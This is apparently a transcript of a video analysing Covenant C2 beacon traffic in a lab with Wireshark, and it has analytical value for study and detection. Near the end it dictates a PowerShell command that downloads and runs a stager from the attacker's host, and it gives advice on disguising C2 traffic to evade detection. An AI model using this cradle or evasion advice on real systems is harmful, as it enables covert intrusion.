Alright guys, welcome back, it's Elsek, and now we're doing a follow-up video of the previous one about Covenant. Now the idea here is that we're gonna analyze the traffic that's been running through my machine, through command VM, while Covenant is active. So let's go and do that. Alright, so my environment is the same again. I have my Covenant up here on my Kali VM. The launcher and the listener settings are unchanged from the last one. We see we generated the custom HTTP profile, and also we've modified the custom one that is being here. So that's HTTP is our own, and the custom HTTP profile is the one we've modified. So we're gonna use that so far. The launcher I created is using the custom HTTP profile to verify the issue was that we were lacking that data value here, and the Covenant was not able to be sure how to parse the data. And we can see now what's going on. Now I'm expected to have more clarity about everything, because whenever we generate a launcher and we go to binary that time, we generate it like that. We have that validate served through, use served pinning through, but overall we are talking about train with HTTP server, not HTTPS. So on the launcher, as you can see, my launcher is being active on port 80, which means we can see the raw requests and we can further analyze what's going on underneath the hood. So I've downloaded my Covenant launcher. I'm gonna move my Covenant launcher here and start a simple Python HTTP server. Now let me download the binary. Of course, I'm sure that they were quite the same, and the launchers are different in case of actually injecting into the target, but I believe that they are working quite the same. We can also test that. So I'm gonna download my Covenant launcher here. I'm gonna go to my desktop, remove the existing one, just to be sure I downloaded the right version, and download that here. Actually, not here, but here. Ah, come on. Alright. I'm gonna open my terminal now, and first of all, let's launch Wireshark and set up the filter to monitor all the connections to my Kali box on port 80. So let's choose the interface, then go with TCP IP, what was it? Not destination, oh, it's IP dot destination host is equal to that, and TCP destination port equal to 80. That means, once again, we're gonna filter all the traffic that comes from the command VM to my Kali box on port 80, because that's where the Covenant launcher is being started. Now, once that thing is set up, I can go ahead and launch my rainy http.exe, which is the Covenant binary, and let's start by analyzing the traffic. So let's go to the very bottom line, and go right click, follow TCP stream, and we can see the raw HTTP requests that were being made to my Covenant. So first of all, we get the URL. So we have enbg index aspx path sum is empty. All right. Then we have the user agent, which is being the macOS thing, which is nice. Host, keep alive, and that's pretty much the header. Then we have the response, which is 200 OK. We have the server version of IS 11, and we have the body, which in that case is I like chess and variable equals something. Now that is whenever I go to my Covenant and profile and then custom HTTP profile, we have that variable equals data, which in that case is empty. So maybe in order to make it like more OPSEC friendly, we have to perform a real gets and response, add multiple ones. So let's go back to commando and let's continue analyzing the things. Now that was the get, and I think that the get request is the first request that says to the Covenant beacon, hey, I'm active, you can start issuing command now. Alright, then we have the post one, which I believe is actually for getting the command, because all the requests beside that, we can see that they are posts as far as I believe. So we have post here, we have a huge piece of data, we're gonna go over that in a minute. Then we have, oh, another get, another post. So it's doing something strange, maybe on a random principle, is trying to ask for commands. But what I believe is that the very first request is always get, as it is for ensuring to inform the Covenant that the beacon is active. And then it tries on a random principle to pretty much go ahead and do different requests. Now, this is the first post request, which I believe asks for the very first command. So I'm gonna copy the body, and I think it's some kind of a base64 string, because here that to me looks like a base64. So I'm gonna go and copy that, and it also actually looks like a JWT, but we don't have the dots. So because it starts with the EA, never mind. So we're gonna copy that, and let's go to base64 decode. Go here and paste it. So decode, and let's see now. We have the GUID, which is being that, and that can be, I think, the Covenant beacon ID. So if we go to my VM, and we have that 8C ending with C5, so here is 8A, so it's not the same. All right. Then we have some kind of a key, which looks like to base64 as well, which is that. So then it's encrypted the messages with that, which should be encrypted. But I mean, we have the key, so we can pretty much decrypt them. And then we have the HMAC, which is that. So let's try to convert that as well, but I believe that should be encrypted as well, decode, and yeah. But the point is that we have the key. So with that key, we can decrypt the message and see what's going on. Now, what I want to see is that if the other messages are having different keys, which is being on random each time, or are they using the same? So for that case, I'm gonna copy that to my notepad, and let's issue and analyze another request. So we have QB, and then we have another QB, and let's copy that now, and go here, decode, and we have GUID, which I believe is the same, and then a different key. So all right, then the key is different, but once again, if we go ahead and parse the, oh yeah, it's different. All right, because I see the last Q in and equals, and I thought it was the same. Never mind. So it's nice because it always have a different generated key. So pretty much what happens is each time the Covenant beacon is asking for commands, it uses a different, I think the same type of encryption, but a different key, which makes it harder to decode. Now, I think that the original idea is the following. Of course, when you have an HTTP traffic, you can see all the requests and you can see all the keys and you can pretty much decrypt the message. But when you're using HTTPS, pretty much you can obfuscate your key and it will not be available, and thus your message will be hidden. So when sticking to 80, boot teamers can easily go ahead and use the key and decrypt the message. But when using to HTTPS, that thing always going to be unavailable because, you know, HTTPS certificates, and that's how they're supposed to work. And that way, they wouldn't be able to pretty much go ahead, read the key, and decrypt the message. Now let's see what happens when I issue a command, because here we have a giant piece of base64, and let's see what that is all about. So all the way down to here. Now let's try to decrypt that, and I believe that should be some kind of gibberish. Decode, we have another key, and we have a giant message. Alright. So pretty much this is bad because we're sticking to HTTP and all this can be decrypted. And let's see what happens when we issue a command, because so far what happens is the beacon connected to the C2 server, and then periodically on, let's say, for 3 seconds, 4 seconds, so on, it asks, is there a command? And the idea is that even though we're using HTTP, the commands, all the traffic is being customly encrypted, as you can see, with different keys each time. But now let's try to issue a command. So let me go to the Kali, and here, all right, and let's try to do shell cmd and ipconfig. Now let's go back to the commando and refresh everything from Wireshark. And I need to set up the previous filtering. Now we can see that periodically asking for connections. We have one HTTP request, one TCP request, one HTTP request, one TCP request, and I'm not sure what that's all about. So let me try to analyze that. if we can get anything juicy from it. So we have the address, the protocol, of course. Let's see here. We have the flags. We have only ARC flag. And that's pretty much it. So nothing that fancy here. All right. The MAC, of course, is present. That's a standard TCP packet. So what I believe is that the HTTP is doing all the work, and you don't say we have the HTTP beacon. So nothing fancy here. If you guys think I missed something about TCP, feel free to post in the comments below, but I'm not sure there's anything fancy from it. Yeah, never mind. So the whole sequence is kind of the same, and it is kind of sus because we can see HTTP, TCP, HTTP, TCP, and so on, and then we have the exact same size of bytes. So we have 27254, 27254, and that's repeated indefinitely. Of course, the URL is the same. I mean, literally the same, and that's why initially on the covenant here we had a bunch of options about the HTTP profile. If I go to my listener, open that profile, default HTTP profile, we can add like multiple cookies. We can add multiple URLs, and that's because Covenant's gonna loop through things. So to be more OPSEC friendly, we want to have as much as URL as possible. We want to have as much as bodies, as much as like useful real life bodies as possible. For example, we don't want to stick with hello world here, but it's gonna be best if we build like a simple web app, simple REST API, returning simple like queries and so on. The idea here is to make it look realistic and that the client is actually talking to an HTTP or HTTPS server, right? Because if you see the same hello world and that thing is being repeated like each second, and we have the exact same URL, the exact same endpoint, the exact same bytes, the exact same methods, and the exact same things, that's obviously a C2, right? And now let's try to issue a command. So go to here, and show cmd ipconfig, and I'm done because yeah, we can see it, yeah. So we had the sequence of TCP, HTTP, and so on, and now we have a sequence of HTTP and 4 TCP bytes, and then we have another HTTP, TCP, HTTP, TCP. So whenever we see a sequence of HTTP, TCP is being the callback of are there any commands, and whenever I run the command, we have a 4 TCP packets and HTTP followed by 4 TCP packets. Let me try another command to see if that thing of behavior is the same for each command. So I'm gonna do shell cmd and then let's try dir. Come on. Yeah, we have the same behavior. 1 HTTP, 4 TCP. Alright, but that's about the HTTP, the shell cmd command. Alright, let's try to import some PowerShell script. Let's say PowerShell import, or let's type assembly. Let's see how that goes. So assembly, browse, and let's try that win piece once again. Now let's go execute and analyze what's going on under the hood. If we're gonna have the same structure with 1 HTTP 4 TCP or something else. Of course, the response of that should be returned as well. So I believe, yeah, my Wireshark crashed. Amazing. Can you just? Oh, all right. So yeah, we have a lot of output here. So we had that 4 TCP bytes because the output of the ipconfig was not that huge. And so what pretty much happens is that depending on your output and what command you run, you're sending more and more packets, and obviously and so on. So let's try to analyze that. So follow TCP stream, and let's see now. So nothing unusual here. So this is pretty much the core info beacon. So whenever I see a variable, so what I think is happening is that all the commands are being passed to that variable thing, because as you can see, the majority of requests were empty. Just the beacon were asking, is there any command? And as you can see, the variable thing is being empty. Now, whenever the variable is not empty, we can see a big chunk of data depending on what the variable was. So here, let's try to find the command where the variable was not empty. Maybe I skipped way too much, and now variable is being that. So now we have a command right here, because the syntax of all the previous requests was the same. Empty variable, same response, same request, and that was about it. Now we have the variable here, and it's gonna be better if I just do close to that, refresh the stream, and now just do another shell cmd and do ipconfig. Now I'm gonna refresh the stream once again and be fast. All right. And I got an error. It was not the full WinPiece output, not sure why. Exception, all right, never mind. So let's try to analyze that now. So follow TCP stream, and yeah, so we have one empty request, and then we have that variable thing. So that's how we parse commands. And of course, when you see a huge piece of data like that, it's gonna be sus, because who the heck does like that huge request? Or that's a response, actually. It's a response, yeah, all right, but what is that? I mean, it's kind of sus when you look at it. Then we have another empty request, and then we have, I believe, the output of the command. Now passed as a version here. Now let's try to base64 decoder to see what's going on. And we can see it's again leaking the encrypted message plus the key in base64. Yeah, so that's all about it, and that's how pretty much Covenant really works. Now another thing left to do is to have that with a Powershell launcher to see if it's the same or is it doing something different. So I'm gonna remove that thing, and I'm gonna go and kill my session there. I think it's already been killed, but I'm gonna hide it. Now I'm gonna go to launcher, PowerShell, copy the command, go to here, and I believe my clipboard is not shared. Let's see. Yeah, it's not, so I'm gonna have that hosted. So launcher, PowerShell, copy that, go to here and do vim log.md or cov.ps1, never mind. Set paste that, and host the HTTP server once again. Now, let's refresh the whole thing once again, like that. And we don't need that, of course. Go to IP, yeah, the same port, the same filter. And now let's do IEX, new object. And I want to just see if we can see the raw IEX command. So I'm going to do IEX new object net.web client download string HTTP 192.168.91.135.80.99 and cov.ps1. Let's see how that's gonna work. So here, let's go to follow TCP stream, and we have, yeah, pretty much it's been easy to see what's going on, right? So we have the GET request, pretty much nothing's been encrypted, and it's super easy to actually see, hey, that executed the fucking Covenant stager. So we have the request, we have the response, and the body is fairly as just pretty much the Covenant launcher itself, which is also well known and well flagged. And that's a problem which I'm not sure how to bypass that with the Powershell itself, but I'm gonna be researching on that, because of course that's a huge problem, you know. Everything's being visible. But never mind, let's go back, and I'm gonna do port 80 and I'm gonna reset it. And let's observe what's going on. So the launcher should be active now, and we can see pretty much the same behavior. So we have that HTTP TCP, and so on. So that's about it. And if we run command like, let's try something bigger, which is gonna generate more output. So I'm gonna do, let's say, shell cmd, then dir into C, Windows, system32. Let's send that. And we have 5 TCP. So depending on the output, you have that many, once again, TCP packets. So it's not 5, it's more. But that's how it pretty much works. So if you want, you can go ahead, test it yourself, have the key and decrypt that. I'm not gonna do that now, but what I'm gonna leave for the next video is try to research how to bypass that Powershell thing, because if we're gonna use SEO certificates, I'm not sure if the Powershell is gonna perform well enough, but I'm really not sure, and gonna test that out. So hope you enjoyed the video. Hope you learned something new, guys. If that's the case, always make sure to like the video, share, subscribe to our channel. And if you have any future idea about video content, make sure to post them right in the comment, or feel free to join my Discord where we share any kind of knowledge, experience, ask questions, debug things together, and pretty much have fun. So, see you guys in the next one, and take care.